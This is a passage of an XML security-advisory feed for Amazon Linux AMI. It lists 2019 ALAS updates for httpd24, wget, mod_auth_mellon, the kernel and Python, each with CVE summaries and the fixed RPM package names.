</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5407" title="" id="CVE-2018-5407" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1559" title="" id="CVE-2019-1559" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl" version="1.0.2k" release="16.150.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.2k-16.150.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.2k" release="16.150.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.2k-16.150.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="16.150.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.2k-16.150.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="16.150.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.2k-16.150.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.2k" release="16.150.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.2k-16.150.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="16.150.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-debuginfo-1.0.2k-16.150.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.2k" release="16.150.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-1.0.2k-16.150.amzn1.i686.rpm</filename></package><package name="openssl-static" version="1.0.2k" release="16.150.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-static-1.0.2k-16.150.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="16.150.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-devel-1.0.2k-16.150.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.2k" release="16.150.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-perl-1.0.2k-16.150.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1189</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1189: important priority package update for httpd24</title><issued date="2019-04-05 20:05:00" /><updated date="2019-08-06 21:31:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-0220:
1695036:
CVE-2019-0220 httpd: URL normalization inconsistency
CVE-2019-0217:
A race condition was found in mod_auth_digest when the web server was running in a threaded MPM configuration. It could allow a user with valid credentials to authenticate using another username, bypassing configured access control restrictions.
1695020:
CVE-2019-0217 httpd: mod_auth_digest: access control bypass due to race condition
CVE-2019-0215:
In Apache HTTP Server 2.4 releases 2.4.37 and 2.4.38, a bug in mod_ssl when using per-location client certificate verification with TLSv1.3 allowed a client to bypass configured access control restrictions.
1695025:
CVE-2019-0215 httpd: mod_ssl: access control bypass when using per-location client certification authentication
CVE-2019-0211:
1694980:
CVE-2019-0211 httpd: privilege escalation from modules scripts
CVE-2019-0197:
1695042:
CVE-2019-0197 httpd: mod_http2: possible crash on late upgrade
CVE-2019-0196:
1695030:
CVE-2019-0196 httpd: mod_http2: read-after-free on a string compare
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0196" title="" id="CVE-2019-0196" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0197" title="" id="CVE-2019-0197" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0211" title="" id="CVE-2019-0211" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0215" title="" id="CVE-2019-0215" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0217" title="" id="CVE-2019-0217" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0220" title="" id="CVE-2019-0220" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="httpd24-manual" version="2.4.39" release="1.87.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd24-manual-2.4.39-1.87.amzn1.noarch.rpm</filename></package><package name="mod24_session" version="2.4.39" release="1.87.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_session-2.4.39-1.87.amzn1.x86_64.rpm</filename></package><package name="mod24_md" version="2.4.39" release="1.87.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_md-2.4.39-1.87.amzn1.x86_64.rpm</filename></package><package name="mod24_ssl" version="2.4.39" release="1.87.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_ssl-2.4.39-1.87.amzn1.x86_64.rpm</filename></package><package name="httpd24-tools" version="2.4.39" release="1.87.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-tools-2.4.39-1.87.amzn1.x86_64.rpm</filename></package><package name="httpd24-devel" version="2.4.39" release="1.87.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-devel-2.4.39-1.87.amzn1.x86_64.rpm</filename></package><package name="httpd24" version="2.4.39" release="1.87.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-2.4.39-1.87.amzn1.x86_64.rpm</filename></package><package name="mod24_proxy_html" version="2.4.39" release="1.87.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_proxy_html-2.4.39-1.87.amzn1.x86_64.rpm</filename></package><package name="mod24_ldap" version="2.4.39" release="1.87.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_ldap-2.4.39-1.87.amzn1.x86_64.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.39" release="1.87.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-debuginfo-2.4.39-1.87.amzn1.x86_64.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.39" release="1.87.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-debuginfo-2.4.39-1.87.amzn1.i686.rpm</filename></package><package name="mod24_proxy_html" version="2.4.39" release="1.87.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_proxy_html-2.4.39-1.87.amzn1.i686.rpm</filename></package><package name="httpd24" version="2.4.39" release="1.87.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-2.4.39-1.87.amzn1.i686.rpm</filename></package><package name="httpd24-tools" version="2.4.39" release="1.87.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-tools-2.4.39-1.87.amzn1.i686.rpm</filename></package><package name="httpd24-devel" version="2.4.39" release="1.87.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-devel-2.4.39-1.87.amzn1.i686.rpm</filename></package><package name="mod24_session" version="2.4.39" release="1.87.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_session-2.4.39-1.87.amzn1.i686.rpm</filename></package><package name="mod24_ldap" version="2.4.39" release="1.87.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_ldap-2.4.39-1.87.amzn1.i686.rpm</filename></package><package name="mod24_ssl" version="2.4.39" release="1.87.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_ssl-2.4.39-1.87.amzn1.i686.rpm</filename></package><package name="mod24_md" version="2.4.39" release="1.87.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_md-2.4.39-1.87.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1194</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1194: important priority package update for wget</title><issued date="2019-04-17 18:51:00" /><updated date="2019-04-19 16:26:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-5953:
1695679:
CVE-2019-5953 wget: Buffer overflow vulnerability
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5953" title="" id="CVE-2019-5953" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="wget-debuginfo" version="1.18" release="5.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/wget-debuginfo-1.18-5.30.amzn1.x86_64.rpm</filename></package><package name="wget" version="1.18" release="5.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/wget-1.18-5.30.amzn1.x86_64.rpm</filename></package><package name="wget" version="1.18" release="5.30.amzn1" epoch="0" arch="i686"><filename>Packages/wget-1.18-5.30.amzn1.i686.rpm</filename></package><package name="wget-debuginfo" version="1.18" release="5.30.amzn1" epoch="0" arch="i686"><filename>Packages/wget-debuginfo-1.18-5.30.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1200</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1200: important priority package update for mod24_auth_mellon</title><issued date="2019-05-02 17:18:00" /><updated date="2019-05-06 17:51:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-3878:
A vulnerability was found in mod_auth_mellon. If Apache is configured as a reverse proxy and mod_auth_mellon is configured to only let through authenticated users (with the require valid-user directive), adding special HTTP headers that are normally used to start the special SAML ECP (non-browser based) can be used to bypass authentication.
1691126:
CVE-2019-3878 mod_auth_mellon: authentication bypass in ECP flow
CVE-2019-3877:
A vulnerability was found in mod_auth_mellon before v0.14.2. An open redirect in the logout URL allows requests with backslashes to pass through by assuming that it is a relative URL, while the browsers silently convert backslash characters into forward slashes treating them as an absolute URL. This mismatch allows an attacker to bypass the redirect URL validation logic in apr_uri_parse function.
1691125:
CVE-2019-3877 mod_auth_mellon: open redirect in logout url when using URLs with backslashes
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3877" title="" id="CVE-2019-3877" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3878" title="" id="CVE-2019-3878" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod24_auth_mellon-diagnostics" version="0.14.0" release="2.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_auth_mellon-diagnostics-0.14.0-2.8.amzn1.x86_64.rpm</filename></package><package name="mod24_auth_mellon-debuginfo" version="0.14.0" release="2.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_auth_mellon-debuginfo-0.14.0-2.8.amzn1.x86_64.rpm</filename></package><package name="mod24_auth_mellon" version="0.14.0" release="2.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_auth_mellon-0.14.0-2.8.amzn1.x86_64.rpm</filename></package><package name="mod24_auth_mellon-diagnostics" version="0.14.0" release="2.8.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_auth_mellon-diagnostics-0.14.0-2.8.amzn1.i686.rpm</filename></package><package name="mod24_auth_mellon-debuginfo" version="0.14.0" release="2.8.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_auth_mellon-debuginfo-0.14.0-2.8.amzn1.i686.rpm</filename></package><package name="mod24_auth_mellon" version="0.14.0" release="2.8.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_auth_mellon-0.14.0-2.8.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1201</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1201: important priority package update for kernel</title><issued date="2019-05-02 17:22:00" /><updated date="2019-05-06 17:49:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-7308:
A bypass was found for the Spectre v1 hardening in the eBPF engine of the Linux kernel. The code in the kernel/bpf/verifier.c performs undesirable out-of-bounds speculation on pointer arithmetic in various cases, including cases of different branches with different state or limits to sanitize, leading to side-channel attacks.
1672355:
CVE-2019-7308 kernel: eBPF: Spectre v1 mitigation bypass
CVE-2019-3460:
A flaw was found in the Linux kernel&#039;s implementation of logical link control and adaptation protocol (L2CAP), part of the Bluetooth stack in the l2cap_parse_conf_rsp and l2cap_parse_conf_req functions. An attacker with physical access within the range of standard Bluetooth transmission can create a specially crafted packet. The response to this specially crafted packet can contain part of the kernel stack which can be used in a further attack.
1663179:
CVE-2019-3460 kernel: Heap address information leak while using L2CAP_PARSE_CONF_RSP
CVE-2019-3459:
A flaw was found in the Linux kernels implementation of Logical link control and adaptation protocol (L2CAP), part of the Bluetooth stack. An attacker with physical access within the range of standard Bluetooth transmission can create a specially crafted packet. The response to this specially crafted packet can contain part of the kernel stack which can be used in a further attack.
1663176:
CVE-2019-3459 kernel: Heap address information leak while using L2CAP_GET_CONF_OPT
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3459" title="" id="CVE-2019-3459" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3460" title="" id="CVE-2019-3460" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7308" title="" id="CVE-2019-7308" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel" version="4.14.114" release="82.97.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.114-82.97.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.114" release="82.97.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.114-82.97.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.114" release="82.97.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.114-82.97.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.114" release="82.97.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.114-82.97.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.114" release="82.97.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.114-82.97.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.114" release="82.97.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.114-82.97.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.114" release="82.97.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.114-82.97.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.114" release="82.97.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.114-82.97.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.114" release="82.97.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.114-82.97.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.114" release="82.97.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.114-82.97.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.114" release="82.97.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.114-82.97.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.114" release="82.97.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.114-82.97.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.114" release="82.97.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.114-82.97.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.114" release="82.97.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.114-82.97.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.114" release="82.97.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.114-82.97.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.114" release="82.97.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.114-82.97.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.114" release="82.97.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.114-82.97.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.114" release="82.97.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.114-82.97.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.114" release="82.97.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.114-82.97.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.114" release="82.97.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.114-82.97.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1202</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1202: important priority package update for python34</title><issued date="2019-05-02 17:31:00" /><updated date="2019-05-06 17:48:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-9636:
Python 2.7.x through 2.7.16 and 3.x through 3.7.2 is affected by: Improper Handling of Unicode Encoding (with an incorrect netloc) during NFKC normalization. The impact is: Information disclosure (credentials, cookies, etc. that are cached against a given hostname). The components are: urllib.parse.urlsplit, urllib.parse.urlparse. The attack vector is: A specially crafted URL could be incorrectly parsed to locate cookies or authentication data and send that information to a different host than when parsed correctly.
1688543:
CVE-2019-9636 python: Information Disclosure due to urlsplit improper NFKC normalization
CVE-2018-20406:
Modules/_pickle.c in Python before 3.7.1 has an integer overflow via a large LONG_BINPUT value that is mishandled during a &quot;resize to twice the size&quot; attempt. This issue might cause memory exhaustion, but is only relevant if the pickle format is used for serializing tens or hundreds of gigabytes of data.
1664509:
CVE-2018-20406 python: Integer overflow in Modules/_pickle.c allows for memory exhaustion if serializing gigabytes of data
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20406" title="" id="CVE-2018-20406" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9636" title="" id="CVE-2019-9636" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python34" version="3.4.10" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-3.4.10-1.43.amzn1.x86_64.rpm</filename></package><package name="python34-debuginfo" version="3.4.10" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-debuginfo-3.4.10-1.43.amzn1.x86_64.rpm</filename></package><package name="python34-libs" version="3.4.10" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-libs-3.4.10-1.43.amzn1.x86_64.rpm</filename></package><package name="python34-devel" version="3.4.10" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-devel-3.4.10-1.43.amzn1.x86_64.rpm</filename></package><package name="python34-tools" version="3.4.10" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-tools-3.4.10-1.43.amzn1.x86_64.rpm</filename></package><package name="python34-test" version="3.4.10" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-test-3.4.10-1.43.amzn1.x86_64.rpm</filename></package><package name="python34-devel" version="3.4.10" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/python34-devel-3.4.10-1.43.amzn1.i686.rpm</filename></package><package name="python34-debuginfo" version="3.4.10" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/python34-debuginfo-3.4.10-1.43.amzn1.i686.rpm</filename></package><package name="python34-libs" version="3.4.10" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/python34-libs-3.4.10-1.43.amzn1.i686.rpm</filename></package><package name="python34-tools" version="3.4.10" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/python34-tools-3.4.10-1.43.amzn1.i686.rpm</filename></package><package name="python34-test" version="3.4.10" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/python34-test-3.4.10-1.43.amzn1.i686.rpm</filename></package><package name="python34" version="3.4.10" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/python34-3.4.10-1.43.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1204</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1204: important priority package update for python36</title><issued date="2019-05-29 19:20:00" /><updated date="2019-08-06 21:28:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-9947:
An issue was discovered in urllib2 in Python 2.x through 2.7.16 and urllib in Python 3.x through 3.7.3. CRLF injection is possible if the attacker controls a url parameter, as demonstrated by the first argument to urllib.request.urlopen with \r\n (specifically in the path component of a URL that lacks a ? character) followed by an HTTP header or a Redis command. This is similar to the CVE-2019-9740 query string issue.
1695572:
CVE-2019-9947 python: improper neutralization of CRLF sequences in urllib module
CVE-2019-9740:
An issue was discovered in urllib2 in Python 2.x through 2.7.16 and urllib in Python 3.x through 3.7.3. CRLF injection is possible if the attacker controls a url parameter, as demonstrated by the first argument to urllib.request.urlopen with \r\n (specifically in the query string after a ? character) followed by an HTTP header or a Redis command.
1688169:
CVE-2019-9740 python: improper neutralization of CRLF sequences in urllib module
1688169:
CVE-2019-9740 python: CRLF injection via the query part of the url passed to urlopen()
CVE-2019-9636:
Python 2.7.x through 2.7.16 and 3.x through 3.7.2 is affected by: Improper Handling of Unicode Encoding (with an incorrect netloc) during NFKC normalization. The impact is: Information disclosure (credentials, cookies, etc. that are cached against a given hostname). The components are: urllib.parse.urlsplit, urllib.parse.urlparse. The attack vector is: A specially crafted URL could be incorrectly parsed to locate cookies or authentication data and send that information to a different host than when parsed correctly.
1688543:
CVE-2019-9636 python: Information Disclosure due to urlsplit improper NFKC normalization
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9636" title="" id="CVE-2019-9636" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9740" title="" id="CVE-2019-9740" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9947" title="" id="CVE-2019-9947" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python36-devel" version="3.6.8" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-devel-3.6.8-1.13.amzn1.x86_64.rpm</filename></package><package name="python36-libs" version="3.6.8" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-libs-3.6.8-1.13.amzn1.x86_64.rpm</filename></package><package name="python36" version="3.6.8" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-3.6.8-1.13.amzn1.x86_64.rpm</filename></package><package name="python36-tools" version="3.6.8" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-tools-3.6.8-1.13.amzn1.x86_64.rpm</filename></package><package name="python36-debug" version="3.6.8" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-debug-3.6.8-1.13.amzn1.x86_64.rpm</filename></package><package name="python36-test" version="3.6.8" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-test-3.6.8-1.13.amzn1.x86_64.rpm</filename></package><package name="python36-debuginfo" version="3.6.8" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-debuginfo-3.6.8-1.13.amzn1.x86_64.rpm</filename></package><package name="python36-debuginfo" version="3.6.8" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/python36-debuginfo-3.6.8-1.13.amzn1.i686.rpm</filename></package><package name="python36-debug" version="3.6.8" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/python36-debug-3.6.8-1.13.amzn1.i686.rpm</filename></package><package name="python36-devel" version="3.6.8" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/python36-devel-3.6.8-1.13.amzn1.i686.rpm</filename></package><package name="python36-tools" version="3.6.8" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/python36-tools-3.6.8-1.13.amzn1.i686.rpm</filename></package><package name="python36" version="3.6.8" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/python36-3.6.8-1.13.amzn1.i686.rpm</filename></package><package name="python36-libs" version="3.6.8" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/python36-libs-3.6.8-1.13.amzn1.i686.rpm</filename></package><package name="python36-test" version="3.6.8" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/python36-test-3.6.8-1.13.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1205</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1205: important priority package update for kernel</title><issued date="2019-05-07 22:54:00" /><updated date="2019-05-14 23:05:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-11091:
Uncacheable memory on some microprocessors utilizing speculative execution may allow an authenticated user to potentially enable information disclosure via a side channel with local access.
1705312:
CVE-2019-11091 hardware: Microarchitectural Data Sampling Uncacheable Memory (MDSUM)
CVE-2018-12130:
A flaw was found in the implementation of the &quot;fill buffer&quot;, a mechanism used by modern CPUs when a cache-miss is made on L1 CPU cache. If an attacker can generate a load operation that would create a page fault, the execution will continue speculatively with incorrect data from the fill buffer while the data is fetched from higher level caches. This response time can be measured to infer data in the fill buffer.
1646784:
CVE-2018-12130 hardware: Microarchitectural Fill Buffer Data Sampling (MFBDS)
CVE-2018-12127:
Microprocessors use a load port subcomponent to perform load operations from memory or IO. During a load operation, the load port receives data from the memory or IO subsystem and then provides the data to the CPU registers and operations in the CPUs pipelines. Stale load operations results are stored in the &#039;load port&#039; table until overwritten by newer operations. Certain load-port operations triggered by an attacker can be used to reveal data about previous stale requests leaking data back to the attacker via a timing side-channel.
1667782:
CVE-2018-12127 hardware: Micro-architectural Load Port Data Sampling - Information Leak (MLPDS)
CVE-2018-12126:
Modern Intel microprocessors implement hardware-level micro-optimizations to improve the performance of writing data back to CPU caches. The write operation is split into STA (STore Address) and STD (STore Data) sub-operations. These sub-operations allow the processor to hand-off address generation logic into these sub-operations for optimized writes. Both of these sub-operations write to a shared distributed processor structure called the &#039;processor store buffer&#039;. As a result, an unprivileged attacker could use this flaw to read private data resident within the CPU&#039;s processor store buffer.
1646781:
CVE-2018-12126 hardware: Microarchitectural Store Buffer Data Sampling (MSBDS)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12126" title="" id="CVE-2018-12126" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12127" title="" id="CVE-2018-12127" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12130" title="" id="CVE-2018-12130" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11091" title="" id="CVE-2019-11091" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo" version="4.14.114" release="83.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.114-83.126.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.114" release="83.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.114-83.126.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.114" release="83.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.114-83.126.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.114" release="83.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.114-83.126.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.114" release="83.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.114-83.126.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.114" release="83.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.114-83.126.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.114" release="83.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.114-83.126.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.114" release="83.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.114-83.126.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.114" release="83.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.114-83.126.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.114" release="83.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.114-83.126.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.114" release="83.126.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.114-83.126.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.114" release="83.126.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.114-83.126.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.114" release="83.126.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.114-83.126.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.114" release="83.126.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.114-83.126.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.114" release="83.126.amzn1" epoch="0" 